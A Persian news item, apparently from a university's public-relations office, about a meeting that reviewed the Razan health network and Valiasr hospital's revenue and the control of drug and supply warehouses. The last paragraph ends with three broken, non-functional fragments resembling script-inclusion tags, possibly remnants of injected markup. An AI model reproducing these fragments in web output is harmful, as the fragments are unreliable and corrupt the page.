برگزاری جلسه بررسی نقاط قوت و قابل بهبود شبکه بهداشت و درمان و بیمارستان ولیعصر(عج) رزن

جلسه بررسی نقاط قوت و قابل بهبود شبکه بهداشت و درمان و بیمارستان ولیعصر(عج) رزن در دفتر معاونت توسعه مدیریت و منابع دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه بررسی نقاط قوت و قابل بهبود شبکه بهداشت و درمان و بیمارستان ولیعصر(عج) رزن با حضور معاون توسعه مدیریت و منابع دانشگاه، مدیر شبکه بهداشت و درمان شهرستان، رییس و مدیر بیمارستان ولیعصر(ع) رزن و کارشناسان مربوطه برگزار شد.

در این جلسه به راه کارهایی در خصوص افزایش درآمدشبکه و بیمارستان پرداخته شد و منابع ،مصارف و ملزومات مصرفی موجود مورد بازنگری و بررسی قرار گرفت.

مهندس رحیمی ضمن اشاره به کنترل انبارهای دارویی و ملزومات مصرفی عنوان کرد: کنترل و نظارت برانبارهای دارویی و ملزومات پزشکی مطابق با سیاست های پیشین در شبکه بهداشت و درمان شهرستان رزن و بیمارستان ولیعصر (عج) باید مد نظر باشد و پیش بینی های لازم جهت خرید داروها، ملزومات استراتژیک و حیاتی طبق معیارات از پیش تعریف شده انجام شود تا کنترل منابع و مصارف و ملزومات مصرفی به خوبی صورت گیرد.

وی همچنین با توجه به اولویت دهی سیاستهای وزارت متبوع در راستای مدیریت هزینه و درآمد در سال جاری، برگزاری این جلسات و تداوم‌ آن را گامی مهم در تحقق کنترل منابع و مصارف دانشگاه برشمرد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *